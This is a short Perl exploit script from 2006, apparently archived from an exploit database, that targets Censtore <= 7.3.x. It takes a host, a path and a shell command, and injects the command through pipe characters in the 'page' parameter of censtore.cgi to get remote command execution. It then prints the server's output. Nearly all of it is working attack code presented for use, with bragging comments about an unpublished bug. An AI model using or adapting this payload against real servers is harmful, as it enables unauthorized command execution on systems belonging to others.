Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit :

Date : 2006-04-13 Author : FOX_MULDER
#!/usr/bin/perl
#
#  Censtore.cgi exploit by FOX_MULDER ([email protected])
#
#  Vulnerability foud by FOX_MULDER.
#
#  This is the first exploit i release and the bug is not public so enjoy.
#  Ask http://censtore.com/ what they think about it !!!  
#
###########################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "
FOX_MULDER DID IT AGAIN !!!
";
print STDERR "Usage:
cenex.pl <www.example.com> </path/> "cmd"
";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "

 !!! ULTRA PRIVATE EDITION !!! 

";
print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER
";

print "
[+] Conecting to $host
";

my $result = get("http://$host$path/censtore.cgi?page=|$command|"); 

if (defined $result) { 
print $result; 
} 
else { 
print "Error with request.
"; 
}

# milw0rm.com [2006-04-13]

C1

 

C2

 

C3